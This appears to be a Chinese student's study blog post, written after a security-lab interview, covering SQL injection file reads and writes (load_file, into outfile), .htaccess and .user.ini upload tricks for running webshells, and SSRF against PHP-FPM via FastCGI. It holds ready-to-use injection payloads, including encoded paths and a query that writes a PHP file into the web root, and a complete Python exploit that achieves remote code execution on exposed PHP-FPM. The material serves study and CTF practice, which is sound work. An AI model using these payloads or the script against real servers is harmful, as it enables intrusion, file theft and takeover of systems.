上个星期事情是真的多,要考网安导论、操作系统、四级,中间还找了一晚上去实验室面试。师傅们的提问还是比较细节的,自己平时学习的时候没怎么关注过原理,回答的时候好多都回答不上来,这里就重新学习一下。
利用 sql 注入进行读写文件
在数据库中 into outfile 语句把表数据导出到一个文本文件中
load_file 函数读取一个文件并将其内容作为字符串返回
load_file
load_file 在读取文件的时候具有一定的条件限制:
1、必须有权限读取并且文件必须完全可读。
and (select count(*) from mysql.user)>0 /*如果结果返回正常,说明具有读写权限.*/ and (select count(*) from mysql.user)>0 /* 返回错误,应该是管理员给数据库账户降权了*/
2、欲读取文件必须在服务器上
3、文件路径必须是绝对路径,在很多 PHP 程序中,当提交一个错误的查询时,如果 display_errors=on,程序就会暴露 web 目录的绝对路径,只要知道路径,那么对于一个可以注入的 PHP 程序来说,整个服务器的安全将受到严重的威胁
4、欲读取文件必须小于 max_allowed_packet
如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限。
在 windows 下,如果 NTFS 设置得当,是不能读取相关的文件的,当遇到 administrators 才能访问的文件,users 就不能实现用 load_file 读取文件了
(摘自雪碧可乐的文章)
打开 sqlilabs 试一下。
可以看到成功读取了 D 盘的文件
现在大多都会把 magic_quotes_gpc 这个配置打开,那么 load_file 中的引号就不能用了。
不过有两种办法可以解决:
1、使用 char 函数,将每个字符进行编码
union select 1,2,load_file(char(68,58,47,116,101,120,116,46,116,120,116))
2、16 进制转换
union select 1,2,load_file(0x443a2f746578742e747874)
into outfile
在数据库中 into outfile 语句把表数据导出到一个文本文件中,那么利用这个语句,再配合满足的‘三个条件’,即可实现文件或者一句话木马导入到数据库文件的目录中。
1、具有 root 权限。
2、在数据库配置文件中的 配置项含有:secure_file_priv=”。(注意在数据库中此项默认为 secure_file_priv=null)
3、知道数据库的绝对路径。
具体代码如下
?id=1')) union select 1,2,3 into outfile "D:\\phpstudy_pro\\www\\a.php"--+
不过这个函数的满足条件比较苛刻,一般很难实现。
如果能够执行的话,就可以写入一句话木马,得到数据。
配置文件对服务器的修改原理
apache 服务器对应的是 .htaccess 文件
而 nginx 服务器对应的是例如 .user.ini 类型的文件
那么这两个文件具体是如何对服务器进行配置的呢?
htaccess
.htaccess 是一种 Apache 服务器配置文件,用于为特定目录或网站设置服务器规则和行为。它可以用于控制网站的访问权限、文件类型、URL 重定向、错误处理等方面,还可以通过重写 URL 实现伪静态化。
.htaccess 文件采用纯文本方式存储,可以使用任何文本编辑器进行编辑和修改。在 Apache 服务器中,当访问某个目录时,服务器会检查该目录下是否存在.htaccess 文件,如果存在,则按照其中的规则进行配置。
.htaccess 文件的底层原理是通过 Apache 服务器的模块实现的。Apache 服务器包含许多模块,可以通过加载不同的模块实现不同的功能。对于.htaccess 文件中的规则,服务器会根据模块的不同调用不同的处理函数进行处理,从而实现各种功能。
由于.htaccess 文件是基于 Apache 服务器的,因此只能在支持 Apache 服务器的环境中使用,例如在 Linux 和 Windows 系统中安装了 Apache 服务器。同时,由于.htaccess 文件的配置规则非常灵活,可以针对不同的目录和文件进行不同的配置,因此被广泛应用于各种网站和 Web 应用程序中。
(摘自快点好好学习吧的文章)
那么常见的 htaccess 文件内容如下
<FilesMatch "123.jpg"> SetHandler application/x-httpd-php </FilesMatch>
这段代码会让服务器匹配 123.jpg 这个文件,然后将其当作 php 文件解析。
htaccess 能够执行成功也有前提条件:
1、http.conf 文件中要设置 AllowOverride All,此选项是默认 None
2、能够上传.htaccess 文件,一般为黑名单限制
3、LoadModule rewrite_module modules/mod_rewrite.so #模块为开启状态
4、上传目录具有可执行权限。
nginx
php.ini 是 php 的全局配置文件,对整个 web 服务起作用,.user.ini 和.htaccess 都是目录的配置文件,.user.ini 是用户自定义的 php.ini,通常构造后门和隐藏后门。
官方解释: 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER [‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。
在文件里面通常会这样写,涉及到了文件包含
auto_prepend_file 表示加载第一个PHP代码之前执行指示(包含的)PHP文件 auto_append_file 表示加载第一个PHP代码之后执行指示(包含的)PHP文件
下面是一个例子
GIF89a//这一行的作用是用于绕过文件头,一些waf会检测文件是否为图片 auto_prepend_file=1.txt//一句话木马卸载1.txt里上传
SSRF 攻击内网 Fastcgi 协议
Fastcgi record
Fastcgi 其实是一个通信协议,和 HTTP 协议一样,都是进行数据交换的一个通道。
HTTP 协议是浏览器和服务器中间件进行数据交换的协议,浏览器将 HTTP 头和 HTTP 体用某个规则组装成数据包,以 TCP 的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以 HTTP 协议的规则打包返回给服务器。
类比 HTTP 协议来说,fastcgi 协议则是服务器中间件和某个语言后端进行数据交换的协议。Fastcgi 协议由多个 record 组成,record 也有 header 和 body 一说,服务器中间件将这二者按照 fastcgi 的规则封装好发送给语言后端,语言后端解码以后拿到具体数据,进行指定操作,并将结果再按照该协议封装好后返回给服务器中间件。
和 HTTP 头不同,record 的头固定 8 个字节,body 是由头中的 contentLength 指定,其结构如下:
typedef struct { /* Header */ unsigned char version; // 版本 unsigned char type; // 本次record的类型 unsigned char requestIdB1; // 本次record对应的请求id unsigned char requestIdB0; unsigned char contentLengthB1; // body体的大小 unsigned char contentLengthB0; unsigned char paddingLength; // 额外块大小 unsigned char reserved; /* Body */ unsigned char contentData[contentLength]; unsigned char paddingData[paddingLength]; } FCGI_Record;
PHP-FPM(FastCGI 进程管理器)
官方对它的解释是 FPM(FastCGI 进程管理器)用于替换 PHP FastCGI 的大部分附加功能,对于高负载网站是非常有用的。
也就是说 php-fpm 是 FastCGI 的一个具体实现,并且提供了进程管理的功能,在其中的进程中,包含了 master 和 worker 进程,这个在后面我们进行环境搭建的时候可以通过命令查看。其中 master 进程负责与 Web 服务器进行通信,接收 HTTP 请求,再将请求转发给 worker 进程进行处理,worker 进程主要负责动态执行 PHP 代码,处理完成后,将处理结果返回给 Web 服务器,再由 Web 服务器将结果发送给客户端。
简单来说 FPM 就是一个 FastCGI 的解析器,服务器中间件将用户的请求按照 FastCGI 的规则打包后就是传给了 FPM,然后按照用户的请求解析对应的文件。
如果用户访问 http://127.0.0.1/index.php?a=1&b=2 web 目录是 /var/www/html 那么 nginx 会将请求化为下面的键值对
{ 'GATEWAY_INTERFACE': 'FastCGI/1.0', 'REQUEST_METHOD': 'GET', 'SCRIPT_FILENAME': '/var/www/html/index.php', 'SCRIPT_NAME': '/index.php', 'QUERY_STRING': '?a=1&b=2', 'REQUEST_URI': '/index.php?a=1&b=2', 'DOCUMENT_ROOT': '/var/www/html', 'SERVER_SOFTWARE': 'php/fcgiclient', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': '12345', 'SERVER_ADDR': '127.0.0.1', 'SERVER_PORT': '80', 'SERVER_NAME': "localhost", 'SERVER_PROTOCOL': 'HTTP/1.1' }
这个流程图更好理解一点
这篇文章里有 CTFhub 上利用 SSRF 打 Fastcgi 的 wp
exp 脚本有点长,这里看一下关键部分
params = { 'GATEWAY_INTERFACE': 'FastCGI/1.0', 'REQUEST_METHOD': 'POST', 'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'), 'SCRIPT_NAME': uri, 'QUERY_STRING': '', 'REQUEST_URI': uri, 'DOCUMENT_ROOT': documentRoot, 'SERVER_SOFTWARE': 'php/fcgiclient', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': '9985', 'SERVER_ADDR': '127.0.0.1', 'SERVER_PORT': '80', 'SERVER_NAME': "localhost", 'SERVER_PROTOCOL': 'HTTP/1.1', 'CONTENT_TYPE': 'application/text', 'CONTENT_LENGTH': "%d" % len(content), 'PHP_VALUE': 'auto_prepend_file = php://input', 'PHP_ADMIN_VALUE': 'allow_url_include = On' }
可以看到其中的 PHP_VALUE 这个值是用了一个 auto_prepend_file(上面有讲过)并用了 php 伪协议 input,使得我们可以从 body 中构造想执行的命令。即这个 param 就是我们构造的 fastcgi 协议,FPM 按照 fastcgi 的协议将 TCP 流解析成真正的数据。
SCRIPT_FILENAME 这个值指向的是要执行的文件,需要我们构造,web 目录一般就在 /var/www/html 这个文件夹下。实际环境中应该很好找到现有的 php 文件,如果实在找不到,也可以尝试以下方法:通常使用源安装 php 的时候,服务器上也都会附带一些 php 后缀的文件,假设我们爆破不出来目标环境的 web 目录,我们可以找找默认源安装后可能存在的 php 文件,比如 /usr/local/lib/php/PEAR.php。
这里贴一下完整脚本
import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client PY2 = True if sys.version_info.major == 2 else False def bchr(i): if PY2: return force_bytes(chr(i)) else: return bytes([i]) def bord(c): if isinstance(c, int): return c else: return ord(c) def force_bytes(s): if isinstance(s, bytes): return s else: return s.encode('utf-8', 'strict') def force_text(s): if issubclass(type(s), str): return s if isinstance(s, bytes): s = str(s, 'utf-8', 'strict') else: s = str(s) return s class FastCGIClient: """A Fast-CGI Client for Python""" # private __FCGI_VERSION = 1 __FCGI_ROLE_RESPONDER = 1 __FCGI_ROLE_AUTHORIZER = 2 __FCGI_ROLE_FILTER = 3 __FCGI_TYPE_BEGIN = 1 __FCGI_TYPE_ABORT = 2 __FCGI_TYPE_END = 3 __FCGI_TYPE_PARAMS = 4 __FCGI_TYPE_STDIN = 5 __FCGI_TYPE_STDOUT = 6 __FCGI_TYPE_STDERR = 7 __FCGI_TYPE_DATA = 8 __FCGI_TYPE_GETVALUES = 9 __FCGI_TYPE_GETVALUES_RESULT = 10 __FCGI_TYPE_UNKOWNTYPE = 11 __FCGI_HEADER_SIZE = 8 # request state FCGI_STATE_SEND = 1 FCGI_STATE_ERROR = 2 FCGI_STATE_SUCCESS = 3 def __init__(self, host, port, timeout, keepalive): self.host = host self.port = port self.timeout = timeout if keepalive: self.keepalive = 1 else: self.keepalive = 0 self.sock = None self.requests = dict() def __connect(self): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # if self.keepalive: # self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1) # else: # self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0) try: self.sock.connect((self.host, int(self.port))) except socket.error as msg: self.sock.close() self.sock = None print(repr(msg)) return False return True def __encodeFastCGIRecord(self, fcgi_type, content, requestid): length = len(content) buf = bchr(FastCGIClient.__FCGI_VERSION) \ + bchr(fcgi_type) \ + bchr((requestid >> 8) & 0xFF) \ + bchr(requestid & 0xFF) \ + bchr((length >> 8) & 0xFF) \ + bchr(length & 0xFF) \ + bchr(0) \ + bchr(0) \ + content return buf def __encodeNameValueParams(self, name, value): nLen = len(name) vLen = len(value) record = b'' if nLen < 128: record += bchr(nLen) else: record += bchr((nLen >> 24) | 0x80) \ + bchr((nLen >> 16) & 0xFF) \ + bchr((nLen >> 8) & 0xFF) \ + bchr(nLen & 0xFF) if vLen < 128: record += bchr(vLen) else: record += bchr((vLen >> 24) | 0x80) \ + bchr((vLen >> 16) & 0xFF) \ + bchr((vLen >> 8) & 0xFF) \ + bchr(vLen & 0xFF) return record + name + value def __decodeFastCGIHeader(self, stream): header = dict() header['version'] = bord(stream[0]) header['type'] = bord(stream[1]) header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3]) header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5]) header['paddingLength'] = bord(stream[6]) header['reserved'] = bord(stream[7]) return header def __decodeFastCGIRecord(self, buffer): header = buffer.read(int(self.__FCGI_HEADER_SIZE)) if not header: return False else: record = self.__decodeFastCGIHeader(header) record['content'] = b'' if 'contentLength' in record.keys(): contentLength = int(record['contentLength']) record['content'] += buffer.read(contentLength) if 'paddingLength' in record.keys(): skiped = buffer.read(int(record['paddingLength'])) return record def request(self, nameValuePairs={}, post=''): if not self.__connect(): print('connect failure! please check your fasctcgi-server !!') return requestId = random.randint(1, (1 << 16) - 1) self.requests[requestId] = dict() request = b"" beginFCGIRecordContent = bchr(0) \ + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \ + bchr(self.keepalive) \ + bchr(0) * 5 request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN, beginFCGIRecordContent, requestId) paramsRecord = b'' if nameValuePairs: for (name, value) in nameValuePairs.items(): name = force_bytes(name) value = force_bytes(value) paramsRecord += self.__encodeNameValueParams(name, value) if paramsRecord: request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId) request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId) if post: request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId) request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId) self.sock.send(request) self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND self.requests[requestId]['response'] = b'' return self.__waitForResponse(requestId) def __waitForResponse(self, requestId): data = b'' while True: buf = self.sock.recv(512) if not len(buf): break data += buf data = BytesIO(data) while True: response = self.__decodeFastCGIRecord(data) if not response: break if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \ or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR: if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR: self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR if requestId == int(response['requestId']): self.requests[requestId]['response'] += response['content'] if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS: self.requests[requestId] return self.requests[requestId]['response'] def __repr__(self): return "fastcgi connect host:{} port:{}".format(self.host, self.port) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.') parser.add_argument('host', help='Target host, such as 127.0.0.1') parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php') parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>') parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int) args = parser.parse_args() client = FastCGIClient(args.host, args.port, 3, 0) params = dict() documentRoot = "/" uri = args.file content = args.code params = { 'GATEWAY_INTERFACE': 'FastCGI/1.0', 'REQUEST_METHOD': 'POST', 'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'), 'SCRIPT_NAME': uri, 'QUERY_STRING': '', 'REQUEST_URI': uri, 'DOCUMENT_ROOT': documentRoot, 'SERVER_SOFTWARE': 'php/fcgiclient', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': '9985', 'SERVER_ADDR': '127.0.0.1', 'SERVER_PORT': '80', 'SERVER_NAME': "localhost", 'SERVER_PROTOCOL': 'HTTP/1.1', 'CONTENT_TYPE': 'application/text', 'CONTENT_LENGTH': "%d" % len(content), 'PHP_VALUE': 'auto_prepend_file = php://input', 'PHP_ADMIN_VALUE': 'allow_url_include = On' } response = client.request(params, content)
SSRF 打 redis 后面再学习
从面试来看,自己的不足之处还有很多,还要继续学习
